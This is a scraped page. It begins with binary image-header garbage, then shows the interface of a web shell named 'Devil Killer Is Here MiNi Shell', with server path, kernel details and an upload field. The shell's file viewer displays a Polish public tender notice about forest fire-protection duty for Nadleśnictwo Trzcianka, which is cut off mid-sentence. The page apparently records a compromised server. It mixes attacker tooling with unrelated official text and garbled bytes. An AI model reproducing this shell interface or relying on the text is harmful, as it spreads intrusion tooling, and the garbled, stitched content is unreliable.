JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250213/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250213/0010283601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ochrony przeciwpożarowej lasów – pełnienie dyżurów w Zintegrowanym Punkcie Alarmowo-Dyspozycyjnym w JRG w Trzciance wraz z dyżurem samochodu patrolowo gaśniczego z kierowcą na 2025 i 2026 rok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Trzcianka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570064493</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ogrodowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzcianka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-980</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">trzcianka@pila.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://trzcianka.pila.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ochrony przeciwpożarowej lasów – pełnienie dyżurów w Zintegrowanym Punkcie Alarmowo-Dyspozycyjnym w JRG w Trzciance wraz z dyżurem samochodu patrolowo gaśniczego z kierowcą na 2025 i 2026 rok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5e46b35-1754-4b84-84b4-13edb4f5ea57</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00102836</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00100886/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa ochrony przeciwpożarowej lasów – pełnienie dyżurów w Zintegrowanym Punkcie Alaromowo- Dyspozycyjnym w JRG w Trzciance na 2025 rok</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.pila.lasy.gov.pl/pn/lasy/demand/195712/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na platformie eZamawiający https://zamowienia.pila.lasy.gov.pl/pn/lasy/demand/195712/notice/public/details lub poczty elektronicznej. Wewszelkiej korespondencji Zamawiający i Wykonawcy posługują się numerem<br/>postępowania wskazanym w SWZ. Zamawiający będzie również komunikować się z Wykonawcami za pomocą poczty elektronicznej za pośrednictwem adresu e-mail: trzcianka@pila.lasy.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na Platformie eZamawiający, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min<br/>2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS<br/>Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji, w przypadku Internet Explorer<br/>minimalnie wersja 10.0;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w<br/>formacie .pdf.<br/>8) Zamawiający określa dopuszczalne formaty przesyłanych danych, tj.: plików o<br/>wielkości do 100 MB w formatach: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, docx,<br/>xlsx, csv, jpg, jpeg, tif, png, svg, zip, tar, gz, gzip, 7z, XAdES, CAdES, PAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">20.1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) Zamawiający informuje, iż administratorem danych osobowych jest<br/>Nadleśnictwo Trzcianka ul. Ogrodowa 2, 64-980 Trzcianka, e-mail:<br/>trzcianka@pila.lasy.gov.pl, tel. 67 216 32 25. Z Inspektorem Ochrony Danych można<br/>skontaktować się na adres e-mail: iod@comp-net.pl.<br/>20.2. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, po wybraniu Wykonawcy – na podstawie art. 6 ust. 1 lit. b<br/>RODO w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>20.3. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o art. 18 – 19 oraz 74 – 76 PZP. Zamawiający<br/>udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP, do upływu<br/>terminu do ich wniesienia.<br/>20.4. Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania<br/>zawartej umowy. W przypadku zawarcia umowy w sprawie zamówienia publicznego, dane<br/>osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z<br/>umowy.<br/>20.5. Dane osobowe mogą zostać przekazane podmiotom przetwarzającym dane w imieniu<br/>administratora np. podmiotom świadczącym usługi doradcze, usługi prawne, firmom<br/>zapewniającym niszczenie materiałów itp.<br/>20.6. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane<br/>w sposób zautomatyzowany, w tym również w formie profilowania.<br/>20.7. Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania<br/>dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym Zamawiający<br/>może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowania swoich danych osobowych – zgodnie z art. 16 RODO, przy czym<br/>skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o<br/>którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy<br/>czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego; prawo to nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa) w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w<br/>tym przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d.<br/>20.8. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>20.9. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e<br/>RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>3) określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a<br/>to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust.<br/>1 lit. c RODO.<br/>20.10. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych<br/>lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących<br/>zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej,<br/>w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest pełnienie dyżuru przy monitorach w Zintegrowanym Punkcie Alarmowo Dyspozycyjnym (ZPAD) w okresie trwania akcji bezpośredniej pomiędzy marcem a październikiem 2025 r. oraz 2026 r. na rzecz Nadleśnictwa Trzcianka oraz Krzyż (dyżury odbywać się będą w Zintegrowanym Punkcie Alarmowo – Dyspozycyjnym Nadleśnictwa Trzcianka w siedzibie JRG w Trzciance przy, ul. Broniewskiego 13) oraz pełnienie dyżuru samochodu patrolowo-gaśniczego będącego w posiadaniu Wykonawcy wraz z obsługą kierowcy na rzecz Nadleśnictwa Trzcianka. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75251120-7 - Usługi ochrony przeciwpożarowej lasów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat liczonych wstecz od dnia,<br/>w którym upływa termin składania ofert (a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie): zrealizował lub realizuje (przy<br/>czym w tym przypadku będzie uwzględniana wartość zrealizowanej części<br/>przedmiotu umowy), na podstawie jednej lub większej ilości umów, usługi<br/>polegające na pełnieniu dyżurów przeciwpożarowych, o łącznej wartości<br/>nie mniejszej niż 300 000,00 zł brutto.<br/>b) Warunek ten, w zakresie potencjału technicznego, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>co najmniej 1 szt. samochodu z napędem 4x4 z zamontowanym zestawem<br/>wysokociśnieniowym wraz ze zbiornikiem na wodę o pojemności nie mniej<br/>niż 400 litrów, potrzebnym do obsługi Zintegrowanego Punktu Alarmowo-<br/>Dyspozycyjnego. Dodatkowo (oprócz zestawu wysokociśnieniowego wraz<br/>ze zbiornikiem na wodę o pojemności nie mniej niż 400 litrów) samochód<br/>musi być wyposażony zgodnie z – „Instrukcją obserwatora<br/>przeciwpożarowego punktu obserwacyjnego wraz z informacją dotyczącą<br/>wyposażenia lekkiego samochodu patrolowo – gaśniczego.<br/>c) Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji<br/>zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że<br/>dysponuje lub będzie dysponować co najmniej:<br/>- 2 osobami – obserwatorzy PAD,<br/>- 1 osobą – kierowcą lekkiego samochodu patrolowo – gaśniczego,<br/>który ukończył z wynikiem pozytywnym szkolenie dopuszczające<br/>do pracy z pilarką zgodnie z § 21 rozporządzenia Ministra<br/>Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i<br/>higieny pracy przy wykonywaniu niektórych prac z zakresu<br/>gospodarki leśnej (Dz. U. z 2006 r. Nr 161, poz. 1141) lub<br/>posiadające odpowiadające im uprawnienia wydane na podstawie<br/>poprzednio obowiązujących przepisów albo odpowiadające im<br/>uprawnienia wydane w innych Państwach Członkowskich Unii<br/>Europejskiej.<br/>Każda z osób skierowanych przez Wykonawcę do realizacji przedmiotu<br/>zamówienia powinna posiadać doświadczenie w pełnieniu dyżurów w<br/>sezonie akcji bezpośredniej w ochronie przeciwpożarowej zgodnie z<br/>Instrukcją ochrony przeciwpożarowej obszarów leśnych z 23 grudnia 2019<br/>r. w wymiarze minimum 1 pełnego sezonu (przez pojęcie sezon należy<br/>rozumieć okres od 15 marca do 31 października). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania,oraz w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 6.1. SWZ Wykonawca składa wraz z ofertą oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj.<br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone<br/>zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ oraz<br/>- oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem<br/>stanowiącym załącznik nr 2 do SWZ.<br/>W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 5.1. i 5.3<br/>Zamawiający, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2024<br/>r. poz. 594 z zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej<br/>(wzór oświadczenia o przynależności lub braku przynależności do tej grupy<br/>kapitałowej stanowi załącznik nr 7 do SWZ),<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt<br/>4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>c) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego (według wzoru stanowiącego załącznik nr 4<br/>do SWZ), o których mowa w:<br/>1) art. 108 ust. 1 pkt 3 PZP,<br/>2) art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,<br/>3) art. 108 ust. 1 pkt 5 PZP, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>4) art. 108 ust. 1 pkt 6 PZP,<br/>5) art. 109 ust. 1 pkt 1 PZP, odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych, o których mowa w<br/>ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (t.j.<br/>Dz. U. z 2023 r. poz. 70 ze zm.),<br/>6) art. 109 ust. 1 pkt 8 i 10 PZP.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa<br/>w pkt 6.1. Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących<br/>podmiotowych środków dowodowych:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat (wstecz od dnia w<br/>którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności<br/>jest krótszy– w tym okresie, wraz z podaniem ich wartości brutto, przedmiotu<br/>(rodzaju wykonanych usług), dat wykonania (dat dziennych rozpoczęcia i<br/>zakończenia realizacji usług) i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane należycie (wzór wykazu wykonanych usług<br/>stanowi Załącznik nr 10 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji 